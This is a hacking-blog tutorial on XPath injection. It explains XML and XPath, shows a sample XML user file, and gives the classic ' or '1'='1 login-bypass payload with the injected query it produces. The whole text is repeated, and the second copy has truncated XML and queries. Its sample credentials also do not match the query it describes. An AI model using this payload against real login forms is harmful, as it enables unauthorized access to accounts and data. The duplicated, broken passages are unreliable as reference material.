How to Hack using XPATH?
[Don't forget to read the note at the end of the Tutorial]
Everyday a lot of websites are hacked but most of them are hacking those website just for popularity, and nothing else. Today's tutorial on XPath Injection, in which i will explain you, how we hack website Using XPath Injection. For eg: we take into account a typical Web Application architecture, all data is stored in a Database server. This Database server stores data invarious formats like an LDAP, XML or RDBMS database. The application queries the server and then is able to access the information based on the user input.
Normally attackers try to extract more information, than allowed by manipulating or using the query with specially crafted inputs. Here, in this tutorial we’ll be discussing XPATH Injection techniques to extract data from XML databases. Before we go deeper into XPATH injection lets take a brief look at what XML and XPath is ?
What is XML?
XML stands for "Extensible Markup Language" and was designed to describe data. It provides a platform for programmers to create their own customized tags to store data on database server. An XML document is in almost all ways similar to an RDBMS Database except for the way data is stored in them. In case of a normal database, the data is stored in a table (rows and columns) and in XML the data is stored in nodes, in a "tree" form.
What is XPath?
XPath is a query language used to select data from XML data sources.It is increasingly common for web applications to use XML data files on the back-end, using XPath to perform queries much the same way SQL would be used against a relational database. XPath injection, much like SQL injection, exists when a malicious user can insert arbitrary XPath code into form fields and URL query parameters in order to inject this code directly into the XPath query evaluation engine. Doing so would allow any user to bypass authentication (if an XML-based authentication system is used) or to access restricted data from the XML data source. Lets take examples that will show how XPath works, Let’s assume that the database is represented by the following XML file:
<?xml version=”1.0encoding=”ISO-8859 -1?>
<users>
<user>
<username>r00t3xpl0it</ username>
<password>123</password>
<account>admin</account>
</user>
<user>
<username>moderator2</ username>
<password>m0d2</password>
<account>guest</account>
</user>
<user>
<username>moderator3</ username>
<password>m0d3</password>
<account>guest</account>
</user>
</users>
The above code show how username, password and user account details stored in XML file. Following XPath query is used to returns the account whose username is “r00tacc3ss” and the password is “p@55\/\/0rd : ,
string(//user[username/ text()='r00thack3r' and password/text()='!c3']/ account/text())
If the application developer does not properly filter user input, I will be easily able to inject XPath code and interfere with the query result. For instance, I could input the following values:
Username: ‘ or ’1 = ’1
Password: ‘ or ’1 = ’1
Using these above parameters, the query becomes:
string(//user[username/ text()='' or '1' = '1' and password/text()=''or '1' = '1']/account/text())
As in most of the common SQL Injection attack, I have created a query that always evaluates to true, which means that the application will authenticate the user even if a username or a password have not been provided. And as in a common SQL Injection attack, with XPath injection, the first step is to insert a single quote ( ‘ ) in the field to be tested, introducing a syntax error in the query, and to check whether the application returns an error message.
If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack(i will explain that in future posts), whose goal is to reconstruct the whole data structure. The technique is similar to inference based SQL Injection, as the approach is to inject code that creates a query that returns one bit of information.
<note>
If you enjoyed it, be sure to hit like and share. Also in the comment's ask us if you haven't understood anything.
And as always, you are solely responsible for the misuse of the contents here. Team IHA will and shall not be held responsible and liable for any type of damaged caused by you. </note>
[Don't forget to read the note at the end of the Tutorial]
Everyday a lot of websites are hacked but most of them are hacking those website just for popularity, and nothing else. Today's tutorial on XPath Injection, in which i will explain you, how we hack website Using XPath Injection. For eg: we take into account a typical Web Application architecture, all data is stored in a Database server. This Database server stores data invarious formats like an LDAP, XML or RDBMS database. The application queries the server and then is able to access the information based on the user input.
Normally attackers try to extract more information, than allowed by manipulating or using the query with specially crafted inputs. Here, in this tutorial we’ll be discussing XPATH Injection techniques to extract data from XML databases. Before we go deeper into XPATH injection lets take a brief look at what XML and XPath is ?
What is XML?
XML stands for "Extensible Markup Language" and was designed to describe data. It provides a platform for programmers to create their own customized tags to store data on database server. An XML document is in almost all ways similar to an RDBMS Database except for the way data is stored in them. In case of a normal database, the data is stored in a table (rows and columns) and in XML the data is stored in nodes, in a "tree" form.
What is XPath?
XPath is a query language used to select data from XML data sources.It is increasingly common for web applications to use XML data files on the back-end, using XPath to perform queries much the same way SQL would be used against a relational database. XPath injection, much like SQL injection, exists when a malicious user can insert arbitrary XPath code into form fields and URL query parameters in order to inject this code directly into the XPath query evaluation engine. Doing so would allow any user to bypass authentication (if an XML-based authentication system is used) or to access restricted data from the XML data source. Lets take examples that will show how XPath works, Let’s assume that the database is represented by the following XML file:
<?xml version=”1.0encoding=”ISO-8859
<users>
<user>
<username>r00t3xpl0it</
<password>123</password>
<account>admin</account>
</user>
<user>
<username>moderator2</
<password>m0d2</password>
<account>guest</account>
</user>
<user>
<username>moderator3</
<password>m0d3</password>
<account>guest</account>
</user>
</users>
The above code show how username, password and user account details stored in XML file. Following XPath query is used to returns the account whose username is “r00tacc3ss” and the password is “p@55\/\/0rd : ,
string(//user[username/
If the application developer does not properly filter user input, I will be easily able to inject XPath code and interfere with the query result. For instance, I could input the following values:
Username: ‘ or ’1 = ’1
Password: ‘ or ’1 = ’1
Using these above parameters, the query becomes:
string(//user[username/
As in most of the common SQL Injection attack, I have created a query that always evaluates to true, which means that the application will authenticate the user even if a username or a password have not been provided. And as in a common SQL Injection attack, with XPath injection, the first step is to insert a single quote ( ‘ ) in the field to be tested, introducing a syntax error in the query, and to check whether the application returns an error message.
If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack(i will explain that in future posts), whose goal is to reconstruct the whole data structure. The technique is similar to inference based SQL Injection, as the approach is to inject code that creates a query that returns one bit of information.
<note>
If you enjoyed it, be sure to hit like and share. Also in the comment's ask us if you haven't understood anything.
And as always, you are solely responsible for the misuse of the contents here. Team IHA will and shall not be held responsible and liable for any type of damaged caused by you. </note>
0 comments:
Post a Comment